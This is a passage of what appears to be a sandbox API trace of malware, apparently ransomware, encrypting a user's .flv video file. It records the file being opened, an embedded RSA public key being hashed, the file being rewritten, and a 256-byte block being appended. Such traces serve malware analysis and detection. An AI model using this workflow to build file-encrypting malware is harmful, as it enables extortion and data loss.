dwReserved1=0x0, cFileName="0IPRI83H.flv", cAlternateFileName="")) returned 1 [0196.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0196.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.195] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\0IPRI83H.flv") returned=".flv" [0196.195] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\0IPRI83H.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\0ipri83h.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.198] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=81044) returned 1 [0196.198] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.201] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13c6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.201] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.203] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.203] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x13c94, lpOverlapped=0x0) returned 1 [0196.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.204] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0196.206] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.206] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.206] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.206] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.206] GetLastError () returned 0x0 [0196.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.206] GetLastError () returned 0x0 [0196.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.207] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.207] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0196.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.207] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.207] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.207] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13c90) returned 0x2af5168 [0196.208] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea140 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea188 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.209] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65a8 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6590 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.212] GetCurrentThreadId () returned 0x5d8 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8ad8 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.213] GetCurrentThreadId () returned 0x5d8 [0196.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0196.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65a8 [0196.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0196.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6608 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6620 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65c0 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6590 [0196.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea188 | out: hHeap=0x2c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.224] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x13c8f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x13c8f, lpOverlapped=0x0) returned 1 [0196.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.226] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13c94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.226] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0196.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 